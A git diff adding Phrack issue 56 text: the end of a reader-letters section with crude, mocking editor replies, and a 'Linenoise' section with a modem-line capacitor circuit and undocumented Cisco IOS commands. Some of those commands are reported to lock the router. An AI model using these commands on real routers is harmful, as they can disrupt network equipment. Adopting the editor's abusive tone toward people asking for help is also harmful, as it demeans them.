+full juristiction of their bodies as tokens of their appreciation for your
+overall kickassedness.
+
+    [ Yeah I noticed that too... I'm hoping Phrack will be banned as some
+      sort of intense aphrodisiac.  I'm putting perfume samples in this one
+      and a section entitle "Route's people".  If this doesn't do it, I throw
+      up my hands ]
+
+Maybe you have a policy of keeping those letters out of the sight of the
+general public for some reason that evades me.  Policy, or not, please let
+me take this opportunity to say, baby, if you want it, it's all in me.
+
+    [ Ahem.  Phrack Readership.  I would just like to take this opportunity
+      to say: HOOOOOOLY SHIT!  ONLY THREE AND HALF YEARZ, NINE ISSUEZ AND IT
+      FINALLY WORKED!  I hope you can hang 'cause baby, I gotz th' stamina! ]
+
+Shagging Men For Their Brain Power Since 1996,
+Suzy McAssmunch
+
+    [ Assmunch as I want? ]
+
+|0x2a|------------------------------------------------------------------------|
+
+I need some help and can't trust friends anymore.  Refs would be great.  My
+brother told my landlord some lies and now I'm getting evicted.  I have to
+stay with some relatives now but my fax is out of paper and is a special
+model.  I can't take this trip without the right paper.  Can you help?
+
+anonymous
+
+    [ *speechless*
+      (someone off in the background): "Hey route...  What's wrong?  Dumb
+      got your tounge?" ]
+
+|0x2b|------------------------------------------------------------------------|
+
+I d like some info about video gambling machines..
+
+    [ Well, they're probably some of the worst odds you'll get. ]
+
+could you tell me where I could find some?  thanx!
+
+    [ Las Vegas, NV, Tahoe, NV, Any Indian reservation, Atlantic City, NJ ]
+
+Anomymous
+
+|0x2c|------------------------------------------------------------------------|
+
+Hi I'm new to this hacking an not even sure u are the right person to
+ask but I was chatting to someone in a chatroom recently and we got into
+an argument about something or other...next thing I know my pc crashes
+an refuses to re-boot ..closer inspection reveals the motherboard has
+fried....I can only assume the aformentiond person was the cause of
+this...so how the hell did they do it???....is there anyway I can guard
+against this kind of attack??..
+
+Yours worried,
+Ben
+
+    [ Consider yourself lucky you got off that easy.  This one time I pissed
+      off an online doctor in a chat room.  At first I only had a mild fever,
+      but the next thing I know he's having me do my own amputation...  Two
+      legs and an arm into it, I realize that maybe he's hacking me!  But by
+      then it was too late! ]
+
+
+|0x2d|------------------------------------------------------------------------|
+
+Hello,
+
+I have this person who keeps pissing me off and going out of his/her
+way to do it every time I go into various chat rooms.  I could change my
+screen name I suppose, but I'm not going to do that.  I will not give in.
+
+    [ Don't do it man!  Stand your ground...  The line must be drawn HERE! ]
+
+Once an AOL tech told me that there is a way to bump people like that off
+line, but of course he could not, would not, tell me how.  I can't say as
+I blame him.  However since you guys are into things like this
+
+    [ I try to keep myself thoroughly insulated from America Online (not to
+      be confused with AntiOnline -- they are a whole different kind of dumb).
+      To do this I keep what I call "the three layers of AOL abstraction".
+      That means I don't use America Online, my mom doesn't use America Online,
+      and not even my grandma uses America Online.  I'm not 'into things like
+      this'. ]
+
+could you PLEASE tell me how I can go about doing such a thing...
+should this person start up with me again.  I had to put up with bullies
+in school.  I refuse to be pushed around in the cyber world.
+
+    [ Pent-up passive-aggressive dork alert!  Whoop!  Whoop! ]
+
+And NO i do not want to tell AOL...that would make me out to be a tattle
+tell, and that I'm not.
+
+    [ Whoop!  Whoop!  Boy, you're really lighting up this alarm here! ]
+
+I would appreciate would make me out to be a tattle tell, and that I'm not.
+
+    [ Yah, I heard you the first time. ]
+
+I would appreciate any help that you could give me.
+
+Thank you;
+HDAWG
+
+    [ Well DAWG, it seems to me like you have some serious childhood issues.
+      The only advice I can offer you now is to get lots of therapy, or maybe
+      a swift kick to the nuts for being such a wussy. ]
+ 
+|0x2e|------------------------------------------------------------------------|
+
+I'm not sure if I am writting to the right person or if yall can even help.
+I was wondering if you can tell me how i can clear/clean up my credit report.
+
+Anonymous
+
+    [ Shure.  PAY YOUR FUCKING BILLS ON TIME! ]
+
+|0x2f|------------------------------------------------------------------------|
+
+Fuck you and your ignorant attempts at killing me. As darkness falls upon
+us it is time for revenge. Lock up your windows and doors...I'm coming. I who
+am Indigo. You will know only my name and not my face, for I will come as a
+theif in the night. Beware for tonight is the night of reconcile, beware!
+
+Your Foe;
+Indigo
+
+    [ The night I received this letter I had a turkey pot pie for dinner.
+      I then watched some TV.  Fairly boring evening except when I went down
+      to the dryer to get my laundry, I noticed a sock was missing...
+      Coincidence...  OR NIGHT-THIEF! ]
+
+|0x30|------------------------------------------------------------------------|
+
+In this message you will not see any "welcomes", "good words about you",
+and "asks".  But you will see "TRUTH" and only this!
+
+    [ How about a "you're good at puzzles", or a "route is the best colorer in
+      his ward - he alwayz stays in the lines". ]
+
+You think that you are good because you are hackers?
+
+    [ No, I think I'm good becuase of my daily affirmations.  And you can't
+      take those away from me. ]
+
+Well really you are nothing than lamers who asks stupid questions.
+
+    [ Hey!  That'z not nice!  I've worked hard, and God Fucking Damn you, I'm
+      good enough, smart enough, and people fucking like me! ]
+
+Yes I know that some budies is very stupid, I understand this.
+
+    [ NOT MY BUDDIES MAN!  They're the best buddies a guy could ask for!  I'm
+      talking about you Stan!  And you Gilgamesh!  And of course you Little
+      Omar! ]
+
+But I don't understand why you flame everybody who post to you.
+
+    [ Ya know, it just kinda workz out that way.  You think I *plan* these
+      things? ]
+
+There is some newbies who's really intelligent, and this is important to give
+him info about what they want.  Is this so hard?
+
+In the answers like: "Will you help me? [ In all likelihood, no.]"
+
+    [ PAHAHAHAHAHAHAH.  Man.  That was me?  Shit I'm good! ]
+
+you proof that you don't know answer!!!
+
+    [ Man I can't fool you!  I couldn't fool you on the foolingest day of my
+      life even if I had an electrified fooling machine (which I do have by
+      the way). ]
+
+You magazine is one the worst of all I've seen.
+
+    [ Have you seen "Highlights"? (*shutter*) ]
+
+Why do you think you don't have cash from write this magz,
+
+    [ Maybe because Phrack Magazine iz, waz, and alwayz will be FREE OF
+      CHARGE. ]
+
+I'm sure that if 2600 may be publishing you mag surelly can be published too?
+Answer: You don't publish it because nobody will buy him.
+
+    [ Question:  Who am I selling?  Is he ugly and dumb?  Is it Gary Glitter? ]
+
+"Blessed is he who expects nothing, for he shall not be disappointed."
+
+    [ "Blah Blah Blah". ]
+
+Anonymous english as second (or possibly third) language guy
+
+|0x31|------------------------------------------------------------------------|
+
+hello,
+at the risk of being flamed in your next issue i felt compelled to write.
+
+    [ UH-OH! ]
+
+reading your latest issue's loopback i noticed that several innocent inquiries
+were being blasted by the editor.
+
+    [ You noticed that eh?  How delightfully intuitive! ]
+
+While reading these was funny,
+
+    [ YES! ]
+
+i felt a bit disheartened.
+
+    [ DAMN. ]
+
+Isn't it a major tenant of hacking to promote freedom of information?
+
+    [ Christ.  I am so sick of people hiding behind the /tenet/ of "Information
+      wants to be free, man!".  Mainly because 99% of the people who bleat this
+      platitude like it'z going out of style really don't understand what
+      they're saying.  I will say good day to you Fat Tony. ]
+
+Responding to inquiries about "how do i hack?" with "piss off peon" or
+whatever witty equivalent your publication provided,
+
+    [ Geeze.  I like to think I'm a hair more clever than `piss off peon`... ]
+
+i felt was in direct contrast to the hacker ethic.  how is the tradition ever
+going to continue if no one is willing to nurture the hackers of the future?
+
+    [ Nurture?  Shure.  Change diapers?  No. ]
+
+is Phrack's message that accomplished hackers should horde their skills and
+knowledge to the detriment of future hackers?  Maybe you should provide
+newbies with avenues to learning instead of flaming them with "i'm cooler
+than thou" messages.  perhaps part of the hacker communities bad image is
+their aloofness, their secrecy, and their condescention.  Chew on that
+Phrack.
+
+    [ I'd answer that but all I want to say is: "Job Security". ]
+
+nitefall
+
+|0x32|------------------------------------------------------------------------|
+
+Great e-zine, has a lot of good stuff in it.
+
+    [ Well thankz govern'r! ]
+
+Outta be required reading.
+
+    [ I'm working on a proposal with the Board of Education out here to get
+      Phrack in every classroom.  I *think* it's going to replace the old
+      issues of '3-2-1 Contact' in the library.  I've got a similar bid in
+      with PBS to get a Phrack T.V. show to replace old episodes of K.I.D.S.
+      Incorporated. ]
+      
+Just a couple of stupid questions: how does one learn about network security
+and protecting a LAN?
+
+    [ Beatz the hell out of me.  School? ]
+
+More importantly, what's the best way to go about learning how to compromise
+them?
+
+    [ Do the exact opposite of what you learned about protecting them. ]
+
+Mike
+
+|0x33|------------------------------------------------------------------------|
+
+It's been a LOOONG time since I parsed your 'zine.  It sure isn't the same,
+but it's as good in it's own right.  Unfortunately, since I was sipping my
+coffee while perusing the Loopback file, I must submit the following invoice:
+
+        1 Roll Bounty Paper Towels    .99
+        1 Sample Bottle Windex        .99
+       10 Minutes cleaning screen and
+          draining keyboard           .99
+                            Subtotal 2.97
+      Credit for Causing Extreme laughter
+                                    -2.99
+                                    -----
+                               Total -.02
+
+..Just thought I'd send my own two-cents' 
+Great stuff.  Nine months is NOT too long to wait.
+
+thanks.
+
+m
+
+    [ Cool thankz man!  I'll add those two cents to our operating costs fund!
+      I think that'll give us enough take this baby commercial! ]
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/3.txt b/phrack56/3.txt
new file mode 100644
index 0000000..d5cccc8
--- /dev/null
+++ b/phrack56/3.txt
@@ -0,0 +1,1488 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x03[0x10]
+
+|----------------------------- L I N E N O I S E -----------------------------|
+|-----------------------------------------------------------------------------|
+|------------------------------- phrack staff --------------------------------|
+
+Phrack Linenoise is a hodge-podge.  Part virtual Mr. Bobo'z table, part
+Leftorium; Linenoise is where articles that can't quit make it end up.
+Some of the various reasons things end up here:
+
+- Addendum and Errata
+  There is a section in Linenoise specifically for corrections and additions
+  to previous articles.  Feedback to articles, however, is alwayz placed in the
+  savory loopback section.
+
+- Too short
+  Articles that are just a bit too short to stand on their own, but still
+  contain worthwhile information can end up here.
+
+- Niche audience
+  The articles that cater to a narrow group of readerz might also end up here.
+
+|0x01|------------------------------------------------------------------------|
+|------------ data connections on old electromechanical exchanges ------------|
+|TOKATA & Vladi <lv_tokata@yahoo.com>-----------------------------------------|
+
+In many poor countries (such as Bulgaria) there are still a lot of old
+electromechanical switches - SxS (step-by-step), Panel and Crossbar.  Maybe
+some Phrack readers from these countries download the Phrack releases through
+these switches.  So, I think it is useless to explain the quality of such
+lines. They are damned noisy, mf!
+
+So, with the help of a friend, we developed a new device, a simple one at that,
+which makes a better data connection.  It increases the quality some 30 - 40%!
+We have successfully tested it with many modems (from 2400bps to 33600bps):
+DataLink, SunShine, UMC, Rockwell, US Robotics...  It _will_ work!
+
+
+    Notes:
+
+- This device *only* works on 60V switches.  AFAIK, those are the only SxS
+  switches around.
+
+- List of exchanges (used in Bulgaria), on which this device works:
+
+  SxS  -->   A-29 (Siemens), F-61 (maybe Siemens too), ATS-54 (Russian)
+  Xbar -->   KRS 103/203 (bulgarian), ATSK - 50 (russian)
+
+  For Russian people it's quite easy, because we use almost the exact same
+  exchanges (such as ATS-54 and ATSK-50).
+
+- The device DON'T work on these exchanges:
+
+  - ESK - 10000E (also known as Crosspoint, made by Siemens)
+
+  - "Kvant" (Russian)
+
+  - EWSD, AXE, MT, ESS (and all the digital exchanges)
+
+
+The schematic is very simple:
+
+
+              2
+              __o
+             /    S
+       o----/   o-----|
+       |         1    |
+  o----|--------------|-------o
+       |              |
+       |              |
+  o-----------| |-------------o
+               C
+
+  K -->
+
+  C -->  capacitor.  Use a 1uF one (maximum)!  You can put a smaller one,
+         but _NOT_ put more than 1uF!!!
+
+  S  --> DPST switch.  "1" is position 1, and "2" is position 2.
+
+
+DPST
+
+On the schematic you _must_ :-) see the two phone wires.  They have the
+capacitor and the switched connected to them.
+
+So, what is the use of the DPST switch?
+
+When you begin to dial the switch must be moved to (1).  That will shunt the
+capacitor, otherwise you would not be able to dial through the phone line.
+When the connection is estabilished - move the switch to (2) in order to join
+the capacitor. Gotit?
+
+
+Theory of operation
+
+
+All the noise on the old switches springs up from the electromechanical
+switching process.  Our device (the capacitor) is used as a filter of low
+frequencies (including nasty brooms, which really fuck up data connections).
+
+    - TOKATA & Vladi <lv_tokata@yahoo.com>
+
+|0x02|------------------------------------------------------------------------|
+|------------------------- Undocumented IOS Commands -------------------------|
+|krnl-------------------------------------------------------------------------|
+
+
+
+Introduction
+
+Here are some commands in cisco systems' Internetworking Operating System
+which are hidden from users at any privilege level.  Some are informative,
+while others are rather mundane.  Some will even lock the router if invoked
+incorrectly.  This list is a subset of all hidden commands.  Descriptions
+of commands are included where possible.  All were tested on a box running
+12.0-6S.
+
+
+exec commands
+
+@clear profile (clear cpu profiling)
+@debug ip ospf monitor
+@debug oir (debug online insertion and removal)
+@debug par mo (debug parser modes)
+@debug sanity (debug buffer pool sanity)
+@debug subsys (debug discrete subsystems)
+@debug buffer (additional buffer debugging)
+@gdb kernel 
+@gdb examine pid
+@gdb debug pid 
+@if-console [<slot>] [console|debug]    
+@profile <start> <stop> <granularity>.
+@sh chunk  (show chunks of memory allocated to processes)
+@sh chunk summ (show chunk allocation summary)
+@sh idb  (shows interface database)
+@sh in stats  (gives you switching path output per interface)
+@sh ip ospf maxage-list
+@sh ip ospf delete-list
+@sh ip ospf statistic
+@sh ip ospf bad-checksum
+@sh ip ospf event     
+@sh isis timers
+@sh isis tree  IS-IS link state database AVL tree
+@sh isis tree level-2
+@sh isis private         	
+@sh profile [detail|terse] (show cpu profiling)
+@sh parser modes (shows current process access-tree.)
+@sh parser unresolv (shows unresolved links in access-tree)
+@sh list     
+@sh list none
+@sh region (shows image layout)
+@sh region <address> (shows image layout at given address)
+@sh timers (show timers for timer command in config mode)	
+@sh int <INT> switching (shows switching path information for the interface)
+@sh proc all-events (shows all process events)
+@sh sum (show current stored image checksum)
+@test transmit (test the transmission of L2 frames)    
+
+
+configuration mode commands
+
+@boot system rom
+@boot module   
+@exception-slave dump X.X.X.X      
+@exception-slave protocol tftp
+@exception-slave corefile 
+@ip slow-convergence     
+@ip tftp boot-interface          
+@loopback diag
+@loopback dec (at dec chip)
+@loopback test 
+@loopback micro-linear   
+@loopback motorola
+@scheduler max-task-time 200 (last val in milliseconds)
+@scheduler heapcheck process (memory validation.. after proc)         
+@scheduler heapcheck poll (memory valid after some poll)
+@scheduler run-degraded   (perhaps in a failure mode?)
+@service internal 
+@service slave-coredump       
+@service log backtrace (provides traceback with every logging instance)
+@tunnel carry-security
+
+in bgp config:
+@neighbor ctalkb-out filter-as 100 d
+% filter-as is an obsolete subcommand, use filter-list instead  
+
+in router isis config:
+@partition-avoidance   
+
+
+
+XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+@clear profile
+
+clears out the current CPU profiling configuration.
+
+@debug buffer  
+
+as with buffer sanity checking, no debugging information on lightly
+loaded box.
+
+ctalkb#debug buffer
+Additional buffer checking debugging is on   
+
+@debug ip ospf monitor
+
+provides information on the status of the ospf process in the debugging
+logs.  
+
+ctalkb#debug ip ospf monitor
+OSPF spf monitoring debugging is on    
+2w3d: OSPF: Syncing Routing table with OSPF Database
+-Traceback= 6064B628 603B6D2C 603B6D18
+2w3d: OSPF: Completed Syncing and runtime is 4 msec
+-Traceback= 6064B65C 603B6D2C 603B6D18        
+2w3d: OSPF: Start redist-scanning
+-Traceback= 6064AC20 6062B430 603B6D2C 603B6D18
+2w3d: OSPF: Scan for both redistribution and translation
+-Traceback= 6064AC60 6062B430 603B6D2C 603B6D18
+2w3d: OSPF: End scanning, Elapsed time 0ms
+-Traceback= 6064B13C 6062B430 603B6D2C 603B6D18
+2w3d: OSPF: Syncing Routing table with OSPF Database
+-Traceback= 6064B628 603B6D2C 603B6D18                 
+
+ctalkb#debug oir
+Online Insertion and Removal debugging is on
+2w3d: OIR: Process woke, 'Event', stall=2, usec=0xB6835B36
+-Traceback= 6040967C 603B6D2C 603B6D18
+2w3d: OIR: Shutdown pulled interface for Serial5/0
+-Traceback= 600E30C4 60409204 604096C8 603B6D2C 603B6D18
+2w3d: %OIR-6-REMCARD: Card removed from slot 5, interfaces disabled
+-Traceback= 60409748 603B6D2C 603B6D18
+2w3d: OIR: Remove hwidbs for slot 5
+-Traceback= 60409368 60409750 603B6D2C 603B6D18
+2w3d: OIR: Process woke, 'Event(max not running)', stall=3,
+usec=0xD0115C9E
+-Traceback= 6040967C 603B6D2C 603B6D18
+2w3d: OIR: Process woke, 'Timer(max running)', stall=3, usec=0xDDBB56D6
+-Traceback= 6040967C 603B6D2C 603B6D18
+2w3d: OIR: (Re)Init card 5, retry_count=3
+-Traceback= 60409894 603B6D2C 603B6D18
+2w3d: %OIR-6-INSCARD: Card inserted in slot 5, interfaces administratively
+shut down
+-Traceback= 604098BC 603B6D2C 603B6D18              
+
+@debug par mo (debug parser modes)
+
+this is used to show what is happening at the parser at specific
+instances.  it will show you a basic walkthrough of the lookups needed
+to process the cli commands
+
+ctalkb#debug par mo
+Parser mode debugging is on        
+00:54:40: Look up of parser mode 'controller' succeeded            
+00:54:40: Look up of parser mode 'route-map' succeeded
+
+
+@debug sanity
+
+couldn't get any diagnostic information on this.  router is not
+heavily loaded so there isn't much buffer churn and burn to 
+contend with.  
+
+ctalkb#debug sanity
+Buffer pool sanity debugging is on    
+ 
+@debug subsys 
+
+subsystem information indicates a code segment and its version.  when
+i had debugging on, i tried reloading the system microcode.  this did
+not cause any interesting debugging information.  
+
+ctalkb#debug sub
+Subsystem debugging is on         
+  
+@debug oir 
+
+extended online insertion and removal debugging information.  
+
+@gdb kernel 
+
+i couldn't get this to do much besides render the router inoperable.  
+there seems to be no interface comparable to the stock gnu debugger.
+perhaps there are additional parameters that i am missing.  this applies
+to all of the debugger subcommands found.
+
+ctalkb#gdb ker
+Kernel GDB allowed on console terminal only
+
+ctalkb#gdb ex 91
+||||(lock up)          
+   
+@gdb debug pid 
+ctalkb#                               
+ctalkb#gdb debug 91
+Can't debug your own process
+ctalkb#         
+
+@if-console [<slot>] [console|debug]    
+
+no output since i don't have a viper router or 12XXX.  however,
+this is one of the most interesting hidden commands available for the
+cisco.  it allows you to get on a card console (i.e. per individual slot
+instead of per individual chassis) and print out extended diagnostic
+and debugging information on the specific card.  you enter the card
+in unpriv mode and need to enable before seeing all of the commands.  
+
+@profile <start> <stop> <granularity>.
+
+you can setup cpu profiling in the exec mode with the
+profile command.  process profiling allows you to find which segment
+of code is perhaps hogging the CPU.. what you really need to get use
+out of this feature is a symbol table so you can pull the location of
+the appropriate segment of code.  the segment is defined by the start
+and stop values given to the profile command.  the granularity specifier
+allows you to get down to single instruction level.  
+
+the cpu has its own internal timer that is incremented regardless
+of whether the desired segment of code is executed.  when the desired
+segment of code is executed, a per-profile counter is incremented.  
+comparison of this counter with the overall system timer allows you to
+get some handle on how much of the cpu the specific segment is using.
+
+
+ctalkb#profile ?
+  task
+  start
+  stop
+  hogs
+  <0-FFFFFFFF>
+
+@show chunk  (show chunks of memory allocated to processes)
+
+there is the traditional malloc/free memory management in place
+on the cisco.  there is also chunk allocation.  the main benefit
+of chunk allocation over its predecessor is that memory overhead
+is only paid by the large chunk (which is then carved up into
+smaller pieces) instead of by each individual malloced block.
+
+ctalkb#sh chunk
+Chunk Manager:
+ 142 chunks created, 1 chunks destroyed
+ 46 siblings created, 0 siblings trimmed
+
+Chunk element  Block Maximum  Element Element Total
+cfgsize Ohead   size element    inuse   freed Ohead    Name
+      16     0 65532    3270      717    2553        8 List Elements
+0x61525688
+      52     0 65532    1168        0    1168        0 List Headers
+0x61535684
+      16     0 65532    3270        0    3270        8 messages 0x61550068  
+
+
+@show chunk summ 
+
+summary listing of allocated chunks. shows you big chunk size, the 
+number of siblings divided up within that chunk space as well as
+the overhead taken by the chunk.  
+
+ctalkb#sh chunk sum
+Chunk Manager:
+ 142 chunks created, 1 chunks destroyed
+ 46 siblings created, 0 siblings trimmed
+
+     Element Sibling size Total   Total   Total   Inuse Ovrhd Chunk
+Flag size(b) --range(b)-- Siblg   alloc    Free     HWM   (b) name
+D         16   253-  752      0    3270    2553     724     8 ListElements
+D         52  1003- 1502      0    1168    1168       0     0 List Headers
+D         16   253-  752      0    3270    3270      21     8 messages
+D          8   253-  752      0    5450    3974    1476     8 Reg Function
+8 
+
+
+@sh idb  
+
+This command shows the hardware and software interface databases.
+this is cisco's way of keeping track of how many interfaces are present
+on the system.. includes hardware and software interfaces (physical,
+subinterfaces etc).  there is a software limit of 1024 i believe in 
+ios 11 and 2048 in ios 12.  this is a global limit for the router.
+
+output:
+
+ctalkb#sh idb
+
+19 SW IDBs allocated (2296 bytes each)
+
+9 HW IDBs allocated (4008 bytes each)
+HWIDB#1   1   FastEthernet0/0 (Ether)
+HWIDB#2   2   Serial2/0:0 (Serial)
+HWIDB#3   3   Ethernet3/0 (Ether)
+HWIDB#4   4   Ethernet3/1 (Ether)
+HWIDB#5   5   Ethernet3/2 (Ether)
+HWIDB#6   6   Ethernet3/3 (Ether)
+HWIDB#7   7   Serial4/0 (Serial)
+HWIDB#8   8   Serial5/0 (Serial)
+HWIDB#9   9   Loopback0
+
+@sh in stats  (gives you switching path output per interface)
+Ethernet3/0
+          Switching path    Pkts In   Chars In   Pkts Out  Chars Out
+               Processor     786433  594121827     556812  177400752
+             Route cache     107469    8910774     107451    8925784
+                   Total     893902  603032601     664263  186326536       
+
+@sh int e3/0 switching  
+
+goes over some of the basic processes and the data that they are
+processing.  shows what switching paths were used for the specific
+data counted.  basic processes == IP and routing processes.  others
+are lumped into the default category.
+
+
+ctalkb#sh int e3/0 switching
+Ethernet3/0
+          Throttle count          0
+        Drops         RP          0         SP          0
+  SPD Flushes       Fast          0        SSE          0
+  SPD Aggress       Fast          0
+ SPD Priority     Inputs        972      Drops          0
+
+     Protocol       Path    Pkts In   Chars In   Pkts Out  Chars Out
+        Other    Process          0          0        167      10020
+            Cache misses          0
+                    Fast          0          0          0          0
+               Auton/SSE          0          0          0          0
+           IP    Process       4556     282352       3733     541124
+            Cache misses          0                                       
+ 
+
+
+@sh ip ospf maxage-list
+
+don't have ospf running.. would seem that this command shows you 
+the current value of the max-lsa age.  there is some periodic refresh
+which needs to be accounted for.	
+
+ctalkb#sh ip ospf max
+  AS System N
+  Maxage delete timer due in NEVER       
+
+@sh ip ospf delete-list
+
+this command shows you the lsas which have been deleted from
+consideration.  as i don't have ospf running, i can't ascertain whether
+this is lsas which were taken out of consideration by the SPF algorithm
+or by other means.
+
+ctalkb#sh ip ospf delet
+  AS System  N
+
+    Area BACKBONE(0)
+
+    ROUTER and NETWORK LSDB delete list
+
+      Dest: 172.16.0.1, Type: 0, Metric: 1, ADV RTR: 172.16.0.1
+      Path:
+        gateway 172.16.0.1, interface Loopback0
+
+    SUMMARY NET and ASBR LSDB delete list
+
+    TYPE-7 EXTERNAL LSDB delete list
+
+    EXTERNAL LSDB delete list                      
+
+@sh ip ospf statistic
+
+this is a really handy command because it gives you time averages of
+different portions of the ospf process.  this is useful in that it further
+lets you pin down IGP convergence times on your network as well as to 
+isolate the areas which are causing the process to chug.
+
+ctalkb#sh ip ospf stat
+  Area 0: SPF algorithm executed 1 times
+
+  SPF calculation time
+Delta T   Intra D-Intra Summ    D-Summ  Ext     D-Ext   Total   Reason
+2w3d   0        0       0       0       0       0       0       R,
+
+  Avg. and Accumulated time of the last 250 process_ase()
+
+                      Avg.      Accumulated
+    ASBR-lookup       0,        0
+    Forw-Addr-lookup  0,        0
+    compare metric    0,        0              
+... (more)
+
+@sh ip ospf bad-checksum
+
+shows LSAs which have failed the checksum.
+
+not sure if this is a count or actual event times since i didn't
+have ospf functioning.
+
+@sh ip ospf event     
+
+provides a history lists of subprocess function execution.. useful so that
+the operator can understand a bit more about the execution flow
+
+ctalkb#sh ip ospf eve
+1    54700   Generic:  ospf_redist_callback  0x618B36A4
+2    114716  Generic:  ospf_redist_callback  0x618B36A4
+3    174736  Generic:  ospf_redist_callback  0x618B36A4
+4    234756  Generic:  ospf_redist_callback  0x618B36A4
+5    294772  Generic:  ospf_redist_callback  0x618B36A4
+6    320796  Generic:  ospf_build_ex_lsa  0xC658FF00
+7    320796  Generic:  ospf_build_ex_lsa  0xAC100000
+8    320796  Generic:  ospf_build_ex_lsa  0xD16F5C00   
+
+@sh isis timers
+
+useful in that it provides a brief overview of execution flow
+in the isis process.  shows you frequency of things like l1/l2 hello
+etc.
+
+ctalkb#sh isis timers
+  Hello Process
+    Expiration    Type
+|        0.856  (Parent)
+  |        0.856  L2 Hello (Ethernet3/0)
+  |        6.352  L1 Hello (Ethernet3/0)
+  |        6.940  Adjacency
+
+  Update Process
+    Expiration    Type
+|        1.060  (Parent)
+  |        1.060  Ager
+  |        1.352  L2 CSNP (Ethernet3/0)
+  |        8.616  L1 CSNP (Ethernet3/0)
+  |     3:25.860  (Parent)
+    |     3:25.860  LSP refresh
+    |     9:02.160  LSP lifetime
+    |     9:24.568  LSP lifetime
+    |    17:16.084  LSP lifetime
+  |    20:58.536  Dynamic Hostname cleanup    
+
+@sh isis tree  IS-IS link state database AVL tree
+
+shows path and depth taken to get to other level 1/2 intermediate
+systems in some routing domain.  shows both by default.
+
+ctalkb#sh isis tree
+
+IS-IS Level-2 AVL Tree
+Current node = X.X.X.00-00, depth = 0, bal = 0
+  Go down left
+Current node = X.X.Y.00-00, depth = 1, bal = 0
+---> Hit node X.X.Y.00-00
+  Back up to X.X.X.00-00
+Current node = X.X.X.00-00, depth = 0, bal = 0
+---> Hit node X.X.X.00-00
+  Go down right
+Current node = X.X.X.02-00, depth = 1, bal = 0
+---> Hit node X.X.X.02-00
+  Back up to X.X.X.00-00              
+
+@sh isis private
+
+displays a little diagnostic information related to the isis process.
+         	
+ctalkb#sh isis private
+ISIS: FastPSNP cache (hits/misses): 0/4002
+ISIS: LSPIX validations (full/skipped): 216271/490412
+ISIS: LSP HT=0 checksum errors received: 0
+ctalkb#   
+
+@sh list     
+
+perhaps a singly linked list manager which displays global
+pointer to the first element in each linked list as well as the 
+number of members in each list.
+
+ctalkb#     sh list
+List Manager:
+     1415 lists known, 1561 lists created
+
+   ID   Address  Size/Max   Name
+    1  613EE970    11/-     Region List
+    2  613EEE98     1/-     Processor
+    3  613EFDE8     1/-     I/O
+    4  613F0D38     1/-     I/O-2
+    5  6149EDD0     0/-     Sched Critical
+    6  6149ED90     0/-     Sched High
+    7  6149EB00     0/-     Sched Normal   
+
+@sh list none
+ctalkb#     sh list none
+List Manager:
+     1415 lists known, 1561 lists created
+
+   ID   Address  Size/Max   Name
+    1  613EE970    11/-     Region List
+    2  613EEE98     1/-     Processor
+    3  613EFDE8     1/-     I/O
+    4  613F0D38     1/-     I/O-2
+    9  6149ED10    82/-     Sched Idle
+   11  61499A50     8/-     Sched Normal (Old)
+   12  6149CC10     1/-     Sched Low (Old)     
+
+@sh parser modes (shows current process access-tree.)
+  
+ctalkb#sh par mo
+Parser modes:
+Name                Prompt              Top       Alias   Privilege
+exec                                    0x60EFB294TRUE    TRUE
+configure           config              0x60EFABACTRUE    TRUE
+interface           config-if           0x60EF7AECTRUE    TRUE
+subinterface        config-subif        0x60EF7AECTRUE    FALSE
+null-interface      config-if           0x60EFB368TRUE    TRUE
+line                config-line         0x60EF3F84TRUE    TRUE         
+
+@sh parser un
+ctalkb#sh parser un
+Unresolved parse chains:
+   40
+   40
+  198
+  198
+  322      
+
+@sh proc all-events
+ctalkb#sh proc all-events
+Queue Notifications
+     Event    Name                      Pid  1 Process
+  61588410    Pool Grows                  4    Pool Manager            ct
+0
+  615A156C    Log Messages               19    Logger                  ct
+0
+  615EE8A0    IPC inboundQ               11    IPC Seat Manager        ct
+0
+  615EE934    IPC Zone inboundQ           9    IPC Zone Manager        ct
+0
+  61642840    ARP queue                  12    ARP Input               ct
+0
+
+
+@sh profile [detail|terse] (show cpu profiling)
+
+
+ctalkb#sh prof d
+Profiling enabled
+
+Block 0: start = 91, end = FFF, increment = 8, EXEC
+Total = 0
+System total = 9802
+ctalkb#sh prof t
+PROF 91 FFF 8
+PROFTOT 10065
+ctalkb#           
+
+
+
+
+@sh region (shows image layout)
+
+displays the program layout for the uncompressed image.  
+
+ctalkb#sh region
+Region Manager:
+
+      Start         End     Size(b)  Class  Media  Name
+ 0x07800000  0x07FFFFFF     8388608  Iomem  R/W    iomem2
+ 0x20000000  0x21FFFFFF    33554432  Iomem  R/W    iomem
+ 0x57800000  0x57FFFFFF     8388608  Iomem  R/W    iomem2:(iomem2_cwt)
+ 0x60000000  0x677FFFFF   125829120  Local  R/W    main
+ 0x60008900  0x6123AC29    19079978  IText  R/O    main:text
+ 0x6123C000  0x6136A17F     1237376  IData  R/W    main:data
+ 0x6136A180  0x6152565F     1815776  IBss   R/W    main:bss
+ 0x61525660  0x677FFFFF   103655840  Local  R/W    main:heap   
+
+@sh region <address>
+
+picking a random location within memory shows what segment that 
+specific address falls under.  same info can be gleaned from the
+root command.
+
+ctalkb#sh region a 0x07800000
+Address 0x07800000 is located physically in :
+
+  Name  : iomem2
+  Class : Iomem
+  Media : R/W
+  Start : 0x07800000
+  End   : 0x07FFFFFF
+  Size  : 0x00800000    
+
+@sh  sum
+
+this takes the compressed image and computes its checksum.  this is
+compared with the previously stored checksum to ensure integrity.
+
+ctalkb#sh sum
+New checksum of 0x36D03E96 matched original checksum
+ctalkb#                      
+
+@sh timers (show timers for timer command in config mode)	
+ctalkb#sh tim
+
+State  Handle  interval     due  invoked   missed   Process  
+
+@test transmit (test the transmission of L2 frames)    
+
+this command allows you to send the specified number of frames
+to the specified destination:
+
+ctalkb#test transmit
+interface: Ethernet3/0
+total frame size [100]:
+1) To this interface
+2) To another interface
+9) Ask for everything
+Choice: 2
+Encapsulation Type:
+1) Ethertype
+2) SAP
+3) SNAP
+4) SNAP (Cisco OUI)
+5) SNAP (EtherV2 OUI)
+6) Novell 802.3
+Choice: 1
+Protocol type:
+1) IP
+2) XNS
+3) IPX
+9) Ask for everything
+Choice: 1                 
+
+
